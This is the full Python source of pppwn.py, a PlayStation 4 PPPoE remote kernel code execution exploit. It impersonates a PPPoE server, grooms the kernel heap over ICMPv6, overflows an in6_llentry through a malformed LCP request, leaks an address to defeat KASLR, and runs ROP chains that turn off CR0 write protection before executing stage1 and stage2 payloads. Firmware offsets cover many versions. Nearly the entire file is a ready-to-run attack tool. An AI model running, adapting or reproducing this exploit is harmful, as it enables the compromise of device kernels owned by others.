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pppwn.py
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#!/usr/bin/env python3
#
# Copyright (C) 2024 Andy Nguyen
#
# This software may be modified and distributed under the terms
# of the MIT license. See the LICENSE file for details.
from argparse import ArgumentParser
from scapy.all import *
from scapy.layers.ppp import *
from struct import pack, unpack
from sys import exit
from time import sleep
from offsets import *
# PPPoE constants
PPPOE_TAG_HUNIQUE = 0x0103
PPPOE_TAG_ACOOKIE = 0x0104
PPPOE_CODE_PADI = 0x09
PPPOE_CODE_PADO = 0x07
PPPOE_CODE_PADR = 0x19
PPPOE_CODE_PADS = 0x65
PPPOE_CODE_PADT = 0xa7
ETHERTYPE_PPPOEDISC = 0x8863
ETHERTYPE_PPPOE = 0x8864
CONF_REQ = 1
CONF_ACK = 2
CONF_NAK = 3
CONF_REJ = 4
ECHO_REQ = 9
ECHO_REPLY = 10
# FreeBSD constants
NULL = 0
PAGE_SIZE = 0x4000
IDT_UD = 6
SDT_SYSIGT = 14
SEL_KPL = 0
CR0_PE = 0x00000001
CR0_MP = 0x00000002
CR0_EM = 0x00000004
CR0_TS = 0x00000008
CR0_ET = 0x00000010
CR0_NE = 0x00000020
CR0_WP = 0x00010000
CR0_AM = 0x00040000
CR0_NW = 0x20000000
CR0_CD = 0x40000000
CR0_PG = 0x80000000
CR0_ORI = CR0_PG | CR0_AM | CR0_WP | CR0_NE | CR0_ET | CR0_TS | CR0_MP | CR0_PE
VM_PROT_READ = 0x01
VM_PROT_WRITE = 0x02
VM_PROT_EXECUTE = 0x04
VM_PROT_ALL = (VM_PROT_READ | VM_PROT_WRITE | VM_PROT_EXECUTE)
LLE_STATIC = 0x0002
LLE_LINKED = 0x0040
LLE_EXCLUSIVE = 0x2000
LO_INITIALIZED = 0x00010000
LO_WITNESS = 0x00020000
LO_UPGRADABLE = 0x00200000
LO_DUPOK = 0x00400000
LO_CLASSSHIFT = 24
RW_UNLOCKED = 1
MTX_UNOWNED = 4
RW_INIT_FLAGS = ((4 << LO_CLASSSHIFT) | LO_INITIALIZED | LO_WITNESS |
LO_UPGRADABLE)
MTX_INIT_FLAGS = ((1 << LO_CLASSSHIFT) | LO_INITIALIZED | LO_WITNESS)
CALLOUT_RETURNUNLOCKED = 0x10
AF_INET6 = 28
IFT_ETHER = 0x6
ND6_LLINFO_NOSTATE = 0xfffe
# FreeBSD offsets
TARGET_SIZE = 0x100
PPPOE_SOFTC_SC_DEST = 0x24
PPPOE_SOFTC_SC_AC_COOKIE = 0x40
PPPOE_SOFTC_SIZE = 0x1c8
LLTABLE_LLTIFP = 0x110
LLTABLE_LLTFREE = 0x118
SOCKADDR_IN6_SIZE = 0x1c
def p8(val):
return pack('<B', val & 0xff)
def p16(val):
return pack('<H', val & 0xffff)
def p16be(val):
return pack('>H', val & 0xffff)
def p32(val):
return pack('<I', val & 0xffffffff)
def p32be(val):
return pack('>I', val & 0xffffffff)
def p64(val):
return pack('<Q', val & 0xffffffffffffffff)
def p64be(val):
return pack('>Q', val & 0xffffffffffffffff)
class LcpEchoHandler(AsyncSniffer):
def __init__(self, iface):
self.s = conf.L2socket(iface=iface)
super().__init__(opened_socket=self.s,
prn=self.handler,
filter='pppoes && !ip',
lfilter=lambda pkt: pkt.haslayer(PPP_LCP_Echo))
def handler(self, pkt):
self.s.send(
Ether(src=pkt[Ether].dst, dst=pkt[Ether].src, type=ETHERTYPE_PPPOE)
/ PPPoE(sessionid=pkt[PPPoE].sessionid) / PPP() /
PPP_LCP_Echo(code=ECHO_REPLY, id=pkt[PPP_LCP_Echo].id))
class Exploit():
SPRAY_NUM = 0x1000
PIN_NUM = 0x1000
CORRUPT_NUM = 0x1
HOLE_START = 0x400
HOLE_SPACE = 0x10
LCP_ID = 0x41
IPCP_ID = 0x41
SESSION_ID = 0xffff
STAGE2_PORT = 9020
SOURCE_MAC = '41:41:41:41:41:41'
SOURCE_IPV4 = '41.41.41.41'
SOURCE_IPV6 = 'fe80::9f9f:41ff:9f9f:41ff'
TARGET_IPV4 = '42.42.42.42'
BPF_FILTER = '(ip6) || (pppoed) || (pppoes && !ip)'
def __init__(self, offs, iface, stage1, stage2):
self.offs = offs
self.iface = iface
self.stage1 = stage1
self.stage2 = stage2
self.s = conf.L2socket(iface=self.iface, filter=self.BPF_FILTER)
def kdlsym(self, addr):
return self.kaslr_offset + addr
def lcp_negotiation(self):
print('[*] Sending LCP configure request...')
self.s.send(
Ether(src=self.source_mac,
dst=self.target_mac,
type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) /
PPP() / PPP_LCP(code=CONF_REQ, id=self.LCP_ID))
print('[*] Waiting for LCP configure ACK...')
while True:
pkt = self.s.recv()
if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[
PPP_LCP_Configure].code == CONF_ACK:
break
print('[*] Waiting for LCP configure request...')
while True:
pkt = self.s.recv()
if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[
PPP_LCP_Configure].code == CONF_REQ:
break
print('[*] Sending LCP configure ACK...')
self.s.send(
Ether(src=self.source_mac,
dst=self.target_mac,
type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) /
PPP() / PPP_LCP(code=CONF_ACK, id=pkt[PPP_LCP_Configure].id))
def ipcp_negotiation(self):
print('[*] Sending IPCP configure request...')
self.s.send(
Ether(
src=self.source_mac, dst=self.target_mac, type=ETHERTYPE_PPPOE)
/ PPPoE(sessionid=self.SESSION_ID) / PPP() /
PPP_IPCP(code=CONF_REQ,
id=self.IPCP_ID,
options=PPP_IPCP_Option_IPAddress(data=self.SOURCE_IPV4)))
print('[*] Waiting for IPCP configure ACK...')
while True:
pkt = self.s.recv()
if pkt and pkt.haslayer(
PPP_IPCP) and pkt[PPP_IPCP].code == CONF_ACK:
break
print('[*] Waiting for IPCP configure request...')
while True:
pkt = self.s.recv()
if pkt and pkt.haslayer(
PPP_IPCP) and pkt[PPP_IPCP].code == CONF_REQ:
break
print('[*] Sending IPCP configure NAK...')
self.s.send(
Ether(
src=self.source_mac, dst=self.target_mac, type=ETHERTYPE_PPPOE)
/ PPPoE(sessionid=self.SESSION_ID) / PPP() /
PPP_IPCP(code=CONF_NAK,
id=pkt[PPP_IPCP].id,
options=PPP_IPCP_Option_IPAddress(data=self.TARGET_IPV4)))
print('[*] Waiting for IPCP configure request...')
while True:
pkt = self.s.recv()
if pkt and pkt.haslayer(
PPP_IPCP) and pkt[PPP_IPCP].code == CONF_REQ:
break
print('[*] Sending IPCP configure ACK...')
self.s.send(
Ether(src=self.source_mac,
dst=self.target_mac,
type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) /
PPP() / PPP_IPCP(code=CONF_ACK,
id=pkt[PPP_IPCP].id,
options=pkt[PPP_IPCP].options))
def ppp_negotation(self, cb=None, ignore_initial_req=False):
if ignore_initial_req:
print('[*] Waiting for PADI...')
while True:
pkt = self.s.recv()
if pkt and pkt.haslayer(
PPPoED) and pkt[PPPoED].code == PPPOE_CODE_PADI:
break
print('[*] Waiting for PADI...')
while True:
pkt = self.s.recv()
if pkt and pkt.haslayer(
PPPoED) and pkt[PPPoED].code == PPPOE_CODE_PADI:
break
for tag in pkt[PPPoED][PPPoED_Tags].tag_list:
if tag.tag_type == PPPOE_TAG_HUNIQUE:
host_uniq = tag.tag_value
self.pppoe_softc = unpack('<Q', host_uniq)[0]
print('[+] pppoe_softc: {}'.format(hex(self.pppoe_softc)))
self.target_mac = pkt[Ether].src
print('[+] Target MAC: {}'.format(self.target_mac))
self.source_mac = self.SOURCE_MAC
if cb:
ac_cookie = cb()
else:
ac_cookie = b''
print('[+] AC cookie length: {}'.format(hex(len(ac_cookie))))
print('[*] Sending PADO...')
self.s.send(
Ether(src=self.source_mac,
dst=self.target_mac,
type=ETHERTYPE_PPPOEDISC) / PPPoED(code=PPPOE_CODE_PADO) /
PPPoETag(tag_type=PPPOE_TAG_ACOOKIE, tag_value=ac_cookie) /
PPPoETag(tag_type=PPPOE_TAG_HUNIQUE, tag_value=host_uniq))
print('[*] Waiting for PADR...')
while True:
pkt = self.s.recv()
if pkt and pkt.haslayer(
PPPoED) and pkt[PPPoED].code == PPPOE_CODE_PADR:
break
print('[*] Sending PADS...')
self.s.send(
Ether(src=self.source_mac,
dst=self.target_mac,
type=ETHERTYPE_PPPOEDISC) /
PPPoED(code=PPPOE_CODE_PADS, sessionid=self.SESSION_ID) /
PPPoETag(tag_type=PPPOE_TAG_HUNIQUE, tag_value=host_uniq))
def build_fake_ifnet(self):
# Leak address
# Upper bytes are encoded with SESSION_ID
planted = (self.pppoe_softc + 0x07) & 0xffffffffffff
self.source_mac = str2mac(planted.to_bytes(6, byteorder='little'))
print('[+] Source MAC: {}'.format(self.source_mac))
# Fake ifnet
fake_ifnet = bytearray()
fake_ifnet += b'A' * (0x48 - len(fake_ifnet))
fake_ifnet += p64(NULL) # if_addrhead
fake_ifnet += b'A' * (0x70 - len(fake_ifnet))
fake_ifnet += p16(0x0001) # if_index
fake_ifnet += b'A' * (0xa0 - len(fake_ifnet))
fake_ifnet += p8(IFT_ETHER) # ifi_type
fake_ifnet += p8(0) # ifi_physical
fake_ifnet += p8(0x8 + 0x1) # ifi_addrlen
fake_ifnet += b'A' * (0x1b8 - len(fake_ifnet))
fake_ifnet += p64(self.pppoe_softc + PPPOE_SOFTC_SC_DEST) # if_addr
fake_ifnet += b'A' * (0x428 - len(fake_ifnet))
fake_ifnet += p64(self.pppoe_softc + 0x10 - 0x8) # nd_ifinfo
# if_afdata_lock
fake_ifnet += b'A' * (0x480 - len(fake_ifnet))
fake_ifnet += p64(NULL) # lo_name
fake_ifnet += p32(RW_INIT_FLAGS) # lo_flags
fake_ifnet += p32(0) # lo_data
fake_ifnet += p64(NULL) # lo_witness
fake_ifnet += p64(RW_UNLOCKED) # rw_lock
# if_addr_mtx
fake_ifnet += b'A' * (0x4c0 - len(fake_ifnet))
fake_ifnet += p64(NULL) # lo_name
fake_ifnet += p32(MTX_INIT_FLAGS) # lo_flags
fake_ifnet += p32(0) # lo_data
fake_ifnet += p64(NULL) # lo_witness
fake_ifnet += p64(MTX_UNOWNED) # mtx_lock
return fake_ifnet
def build_overflow_lle(self):
# Fake in6_llentry
overflow_lle = bytearray()
# lle_next
overflow_lle += p64(self.pppoe_softc +
PPPOE_SOFTC_SC_AC_COOKIE) # le_next
overflow_lle += p64(NULL) # le_prev
# lle_lock
overflow_lle += p64(NULL) # lo_name
overflow_lle += p32(RW_INIT_FLAGS | LO_DUPOK) # lo_flags
overflow_lle += p32(0) # lo_data
overflow_lle += p64(NULL) # lo_witness
overflow_lle += p64(RW_UNLOCKED) # rw_lock
overflow_lle += p64(self.pppoe_softc + PPPOE_SOFTC_SC_AC_COOKIE -
LLTABLE_LLTIFP) # lle_tbl
overflow_lle += p64(NULL) # lle_head
overflow_lle += p64(NULL) # lle_free
overflow_lle += p64(NULL) # la_hold
overflow_lle += p32(0) # la_numheld
overflow_lle += p32(0) # pad
overflow_lle += p64(0) # la_expire
overflow_lle += p16(LLE_EXCLUSIVE) # la_flags
overflow_lle += p16(0) # la_asked
overflow_lle += p16(0) # la_preempt
overflow_lle += p16(0) # ln_byhint
overflow_lle += p16(ND6_LLINFO_NOSTATE) # ln_state
overflow_lle += p16(0) # ln_router
overflow_lle += p32(0) # pad
overflow_lle += p64(0x7fffffffffffffff) # ln_ntick
return overflow_lle
def build_fake_lle(self):
# First gadget - must be a valid MAC address
# Upper bytes are encoded with SESSION_ID
planted = self.kdlsym(self.offs.FIRST_GADGET) & 0xffffffffffff
self.source_mac = str2mac(planted.to_bytes(6, byteorder='little'))
print('[+] Source MAC: {}'.format(self.source_mac))
# Fake in6_llentry
fake_lle = bytearray()
# lle_next
# Third gadget
fake_lle += p64(
self.kdlsym(self.offs.POP_RBX_POP_R14_POP_RBP_JMP_QWORD_PTR_RSI_10)
) # le_next
fake_lle += p64(NULL) # le_prev
# lle_lock
# Fourth gadget
fake_lle += p64(self.kdlsym(
self.offs.LEA_RSP_RSI_20_REPZ_RET)) # lo_name
fake_lle += p32(RW_INIT_FLAGS | LO_DUPOK) # lo_flags
fake_lle += p32(0) # lo_data
# Fifth gadget
fake_lle += p64(self.kdlsym(
self.offs.ADD_RSP_B0_POP_RBP_RET)) # lo_witness
fake_lle += p64(RW_UNLOCKED) # rw_lock
fake_lle += p64(self.pppoe_softc + PPPOE_SOFTC_SC_DEST -
LLTABLE_LLTFREE) # lle_tbl
fake_lle += p64(NULL) # lle_head
fake_lle += p64(NULL) # lle_free
fake_lle += p64(NULL) # la_hold
fake_lle += p32(0) # la_numheld
fake_lle += p32(0) # pad
fake_lle += p64(0) # la_expire
fake_lle += p16(LLE_STATIC | LLE_EXCLUSIVE) # la_flags
fake_lle += p16(0) # la_asked
fake_lle += p16(0) # la_preempt
fake_lle += p16(0) # ln_byhint
fake_lle += p16(ND6_LLINFO_NOSTATE) # ln_state
fake_lle += p16(0) # ln_router
fake_lle += p32(0) # pad
fake_lle += p64(0x7fffffffffffffff) # ln_ntick
fake_lle += p32(0) # lle_refcnt
fake_lle += p32(0) # pad
fake_lle += p64be(0x414141414141) # ll_addr
# lle_timer
fake_lle += p64(0) # sle
fake_lle += p64(0) # tqe
fake_lle += p32(0) # c_time
fake_lle += p32(0) # pad
fake_lle += p64(NULL) # c_arg
fake_lle += p64(NULL) # c_func
fake_lle += p64(NULL) # c_lock
fake_lle += p32(CALLOUT_RETURNUNLOCKED) # c_flags
fake_lle += p32(0) # c_cpu
# l3_addr6
fake_lle += p8(SOCKADDR_IN6_SIZE) # sin6_len
fake_lle += p8(AF_INET6) # sin6_family
fake_lle += p16(0) # sin6_port
fake_lle += p32(0) # sin6_flowinfo
# sin6_addr
fake_lle += p64be(0xfe80000100000000)
fake_lle += p64be(0x9f9f41ff9f9f41ff)
fake_lle += p32(0) # sin6_scope_id
# pad
fake_lle += p32(0)
# Second gadget
fake_lle[self.offs.SECOND_GADGET_OFF:(
self.offs.SECOND_GADGET_OFF + 8)] = p64(
self.kdlsym(self.offs.PUSH_RBP_JMP_QWORD_PTR_RSI))
# Second ROP chain
rop2 = self.build_second_rop()
# First ROP chain
rop = self.build_first_rop(fake_lle, rop2)
return fake_lle + rop + rop2 + self.stage1
def build_first_rop(self, fake_lle, rop2):
rop = bytearray()
# memcpy(RBX - 0x800, rop2, len(rop2 + stage1))
# RDI = RBX - 0x800
rop += p64(self.kdlsym(self.offs.POP_R12_RET))
rop += p64(self.kdlsym(self.offs.POP_RBP_RET))
rop += p64(self.kdlsym(self.offs.MOV_RDI_RBX_CALL_R12))
rop += p64(self.kdlsym(self.offs.POP_RCX_RET))
rop += p64(-0x800)
rop += p64(self.kdlsym(self.offs.ADD_RDI_RCX_RET))
# RSI += len(fake_lle + rop)
rop += p64(self.kdlsym(self.offs.POP_RDX_RET))
rop_off_fixup = len(rop)
rop += p64(0xDEADBEEF)
rop += p64(self.kdlsym(self.offs.SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET))
rop += p64(0xDEADBEEF)
# RDX = len(rop2 + stage1)
rop += p64(self.kdlsym(self.offs.POP_RDX_RET))
rop += p64(len(rop2 + self.stage1))
# Call memcpy
rop += p64(self.kdlsym(self.offs.MEMCPY))
# Stack pivot
rop += p64(self.kdlsym(self.offs.POP_RAX_RET))
rop += p64(self.kdlsym(self.offs.POP_RBP_RET))
rop += p64(self.kdlsym(self.offs.MOV_RSI_RBX_CALL_RAX))
rop += p64(self.kdlsym(self.offs.POP_RDX_RET))
rop += p64(0x800 + 0x20)
rop += p64(self.kdlsym(self.offs.SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET))
rop += p64(0xDEADBEEF)
rop += p64(self.kdlsym(self.offs.LEA_RSP_RSI_20_REPZ_RET))
# Fixup offset of rop2
rop[rop_off_fixup:rop_off_fixup + 8] = p64(-len(fake_lle + rop))
return rop
def build_second_rop(self):
rop = bytearray()
# setidt(IDT_UD, handler, SDT_SYSIGT, SEL_KPL, 0)
rop += p64(self.kdlsym(self.offs.POP_RDI_RET))
rop += p64(IDT_UD)
rop += p64(self.kdlsym(self.offs.POP_RSI_RET))
rop += p64(self.kdlsym(self.offs.ADD_RSP_28_POP_RBP_RET))
rop += p64(self.kdlsym(self.offs.POP_RDX_RET))
rop += p64(SDT_SYSIGT)
rop += p64(self.kdlsym(self.offs.POP_RCX_RET))
rop += p64(SEL_KPL)
rop += p64(self.kdlsym(self.offs.POP_R8_POP_RBP_RET))
rop += p64(0)
rop += p64(0xDEADBEEF)
rop += p64(self.kdlsym(self.offs.SETIDT))
# Disable write protection
rop += p64(self.kdlsym(self.offs.POP_RSI_RET))
rop += p64(CR0_ORI & ~CR0_WP)
rop += p64(self.kdlsym(self.offs.MOV_CR0_RSI_UD2_MOV_EAX_1_RET))
# Enable RWX in kmem_alloc
rop += p64(self.kdlsym(self.offs.POP_RAX_RET))
rop += p64(VM_PROT_ALL)
rop += p64(self.kdlsym(self.offs.POP_RCX_RET))
rop += p64(self.kdlsym(self.offs.KMEM_ALLOC_PATCH1))
rop += p64(self.kdlsym(self.offs.MOV_BYTE_PTR_RCX_AL_RET))
rop += p64(self.kdlsym(self.offs.POP_RCX_RET))
rop += p64(self.kdlsym(self.offs.KMEM_ALLOC_PATCH2))
rop += p64(self.kdlsym(self.offs.MOV_BYTE_PTR_RCX_AL_RET))
# Restore write protection
rop += p64(self.kdlsym(self.offs.POP_RSI_RET))
rop += p64(CR0_ORI)
rop += p64(self.kdlsym(self.offs.MOV_CR0_RSI_UD2_MOV_EAX_1_RET))
# kmem_alloc(*kernel_map, PAGE_SIZE)
# RDI = *kernel_map
rop += p64(self.kdlsym(self.offs.POP_RAX_RET))
rop += p64(self.kdlsym(self.offs.RET))
rop += p64(self.kdlsym(self.offs.POP_RDI_RET))
rop += p64(self.kdlsym(self.offs.KERNEL_MAP))
rop += p64(self.kdlsym(self.offs.MOV_RDI_QWORD_PTR_RDI_POP_RBP_JMP_RAX))
rop += p64(0xDEADBEEF)
# RSI = PAGE_SIZE
rop += p64(self.kdlsym(self.offs.POP_RSI_RET))
rop += p64(PAGE_SIZE)
# Call kmem_alloc
rop += p64(self.kdlsym(self.offs.KMEM_ALLOC))
# R14 = RAX
rop += p64(self.kdlsym(self.offs.POP_R8_POP_RBP_RET))
rop += p64(self.kdlsym(self.offs.POP_RBP_RET))
rop += p64(0xDEADBEEF)
rop += p64(self.kdlsym(self.offs.MOV_R14_RAX_CALL_R8))
# memcpy(R14, stage1, len(stage1))
# RDI = R14
rop += p64(self.kdlsym(self.offs.POP_R12_RET))
rop += p64(self.kdlsym(self.offs.POP_RBP_RET))
rop += p64(self.kdlsym(self.offs.MOV_RDI_R14_CALL_R12))
# RSI = RSP + len(rop) - rop_rsp_pos
rop += p64(self.kdlsym(self.offs.PUSH_RSP_POP_RSI_RET))
rop_rsp_pos = len(rop)
rop += p64(self.kdlsym(self.offs.POP_RDX_RET))
rop_off_fixup = len(rop)
rop += p64(0xDEADBEEF)
rop += p64(self.kdlsym(self.offs.SUB_RSI_RDX_MOV_RAX_RSI_POP_RBP_RET))
rop += p64(0xDEADBEEF)
# RDX = len(stage1)
rop += p64(self.kdlsym(self.offs.POP_RDX_RET))
rop += p64(len(self.stage1))
# Call memcpy
rop += p64(self.kdlsym(self.offs.MEMCPY))
# Jump into stage1
rop += p64(self.kdlsym(self.offs.JMP_R14))
# Fixup offset of stage1
rop[rop_off_fixup:rop_off_fixup + 8] = p64(-(len(rop) - rop_rsp_pos))
return rop
def run(self):
lcp_echo_handler = LcpEchoHandler(self.iface)
lcp_echo_handler.start()
print('')
print('[+] STAGE 0: Initialization')
self.ppp_negotation(self.build_fake_ifnet, True)
self.lcp_negotiation()
self.ipcp_negotiation()
print('[*] Waiting for interface to be ready...')
while True:
pkt = self.s.recv()
if pkt and pkt.haslayer(ICMPv6ND_RS):
break
self.target_ipv6 = pkt[IPv6].src
print('[+] Target IPv6: {}'.format(self.target_ipv6))
for i in range(self.SPRAY_NUM):
if i % 0x100 == 0:
print('[*] Heap grooming...{}%'.format(100 * i //
self.SPRAY_NUM),
end='\r',
flush=True)
source_ipv6 = 'fe80::{:04x}:41ff:9f9f:41ff'.format(i)
self.s.send(
Ether(src=self.source_mac, dst=self.target_mac) /
IPv6(src=source_ipv6, dst=self.target_ipv6) /
ICMPv6EchoRequest())
while True:
pkt = self.s.recv()
if pkt and pkt.haslayer(ICMPv6ND_NS):
break
if i >= self.HOLE_START and i % self.HOLE_SPACE == 0:
continue
self.s.send(
Ether(src=self.source_mac, dst=self.target_mac) /
IPv6(src=source_ipv6, dst=self.target_ipv6) /
ICMPv6ND_NA(tgt=source_ipv6, S=1) /
ICMPv6NDOptDstLLAddr(lladdr=self.source_mac))
print('[+] Heap grooming...done')
print('')
print('[+] STAGE 1: Memory corruption')
# Send invalid packet to trigger a printf in the kernel. For some
# reason, this causes scheduling on CPU 0 at some point, which makes
# the next allocation use the same per-CPU cache.
for i in range(self.PIN_NUM):
if i % 0x100 == 0:
print('[*] Pinning to CPU 0...{}%'.format(100 * i //
self.PIN_NUM),
end='\r',
flush=True)
self.s.send(
Ether(src=self.source_mac,
dst=self.target_mac,
type=ETHERTYPE_PPPOE))
sleep(0.001)
print('[+] Pinning to CPU 0...done')
# LCP fails sometimes without the wait
sleep(1)
# Corrupt in6_llentry object
overflow_lle = self.build_overflow_lle()
print('[*] Sending malicious LCP configure request...')
for i in range(self.CORRUPT_NUM):
self.s.send(
Ether(src=self.source_mac,
dst=self.target_mac,
type=ETHERTYPE_PPPOE) / PPPoE(sessionid=self.SESSION_ID) /
PPP() / PPP_LCP(code=CONF_REQ,
id=self.LCP_ID,
len=TARGET_SIZE + 4,
data=(PPP_LCP_Option(data=b'A' *
(TARGET_SIZE - 4)) /
PPP_LCP_Option(data=overflow_lle))))
print('[*] Waiting for LCP configure reject...')
while True:
pkt = self.s.recv()
if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[
PPP_LCP_Configure].code == CONF_REJ:
break
# Re-negotiate after rejection
self.lcp_negotiation()
self.ipcp_negotiation()
corrupted = False
for i in reversed(range(self.SPRAY_NUM)):
if i % 0x100 == 0:
print('[*] Scanning for corrupted object...{}'.format(hex(i)),
end='\r',
flush=True)
if i >= self.HOLE_START and i % self.HOLE_SPACE == 0:
continue
source_ipv6 = 'fe80::{:04x}:41ff:9f9f:41ff'.format(i)
self.s.send(
Ether(src=self.source_mac, dst=self.target_mac) /
IPv6(src=source_ipv6, dst=self.target_ipv6) /
ICMPv6EchoRequest())
while True:
pkt = self.s.recv()
if pkt:
if pkt.haslayer(ICMPv6EchoReply):
break
elif pkt.haslayer(ICMPv6ND_NS):
corrupted = True
break
if corrupted:
break
self.s.send(
Ether(src=self.source_mac, dst=self.target_mac) /
IPv6(src=source_ipv6, dst=self.target_ipv6) /
ICMPv6ND_NA(tgt=source_ipv6, S=1) /
ICMPv6NDOptDstLLAddr(lladdr=self.source_mac))
if not corrupted:
print('[-] Scanning for corrupted object...failed. Please retry.')
exit(1)
print(
'[+] Scanning for corrupted object...found {}'.format(source_ipv6))
print('')
print('[+] STAGE 2: KASLR defeat')
print('[*] Defeating KASLR...')
while True:
pkt = self.s.recv()
if pkt and pkt.haslayer(
ICMPv6NDOptSrcLLAddr) and pkt[ICMPv6NDOptSrcLLAddr].len > 1:
break
self.pppoe_softc_list = unpack('<Q', bytes(pkt[IPv6])[0x43:0x4b])[0]
print('[+] pppoe_softc_list: {}'.format(hex(self.pppoe_softc_list)))
self.kaslr_offset = self.pppoe_softc_list - self.offs.PPPOE_SOFTC_LIST
print('[+] kaslr_offset: {}'.format(hex(self.kaslr_offset)))
if (self.pppoe_softc_list & 0xffffffff00000fff
!= self.offs.PPPOE_SOFTC_LIST & 0xffffffff00000fff):
print('[-] Error leak is invalid. Wrong firmware?')
exit(1)
print('')
print('[+] STAGE 3: Remote code execution')
print('[*] Sending LCP terminate request...')
self.s.send(
Ether(
src=self.source_mac, dst=self.target_mac, type=ETHERTYPE_PPPOE)
/ PPPoE(sessionid=self.SESSION_ID) / PPP() / PPP_LCP_Terminate())
self.ppp_negotation(self.build_fake_lle)
print('[*] Triggering code execution...')
self.s.send(
Ether(src=self.source_mac, dst=self.target_mac) /
IPv6(src=self.SOURCE_IPV6, dst=self.target_ipv6) /
ICMPv6EchoRequest())
print('[*] Waiting for stage1 to resume...')
count = 0
while count < 3:
pkt = self.s.recv()
if pkt and pkt.haslayer(PPP_LCP_Configure) and pkt[
PPP_LCP_Configure].code == CONF_REQ:
count += 1
print('[*] Sending PADT...')
self.s.send(
Ether(src=self.source_mac,
dst=self.target_mac,
type=ETHERTYPE_PPPOEDISC) /
PPPoED(code=PPPOE_CODE_PADT, sessionid=self.SESSION_ID))
self.ppp_negotation()
self.lcp_negotiation()
self.ipcp_negotiation()
print('')
print('[+] STAGE 4: Arbitrary payload execution')
print('[*] Sending stage2 payload...')
frags = fragment(
IP(src=self.SOURCE_IPV4, dst=self.TARGET_IPV4) /
UDP(dport=self.STAGE2_PORT) / self.stage2, 1024)
for frag in frags:
self.s.send(Ether(src=self.source_mac, dst=self.target_mac) / frag)
print('[+] Done!')
def main():
parser = ArgumentParser('pppwn.py')
parser.add_argument('--interface', required=True)
parser.add_argument('--fw',
choices=[
'700','701','702','750', '751', '755',
'800', '801', '803', '850', '852',
'900', '903', '904', '950', '951', '960',
'1000', '1001', '1050', '1070', '1071',
'1100'
],
default='1100')
parser.add_argument('--stage1', default='stage1/stage1.bin')
parser.add_argument('--stage2', default='stage2/stage2.bin')
args = parser.parse_args()
print('[+] PPPwn - PlayStation 4 PPPoE RCE by theflow')
print('[+] args: ' + ' '.join(f'{k}={v}' for k, v in vars(args).items()))
with open(args.stage1, mode='rb') as f:
stage1 = f.read()
with open(args.stage2, mode='rb') as f:
stage2 = f.read()
if args.fw in ('700', '701', '702'):
offs = OffsetsFirmware_700_702()
elif args.fw in ('750', '751', '755'):
offs = OffsetsFirmware_750_755()
elif args.fw in ('800', '801', '803'):
offs = OffsetsFirmware_800_803()
elif args.fw in ('850', '852'):
offs = OffsetsFirmware_850_852()
elif args.fw == '900':
offs = OffsetsFirmware_900()
elif args.fw in ('903', '904'):
offs = OffsetsFirmware_903_904()
elif args.fw in ('950', '951', '960'):
offs = OffsetsFirmware_950_960()
elif args.fw in ('1000', '1001'):
offs = OffsetsFirmware_1000_1001()
elif args.fw in ('1050', '1070', '1071'):
offs = OffsetsFirmware_1050_1071()
elif args.fw == '1100':
offs = OffsetsFirmware_1100()
exploit = Exploit(offs, args.interface, stage1, stage2)
exploit.run()
return 0
if __name__ == '__main__':
exit(main())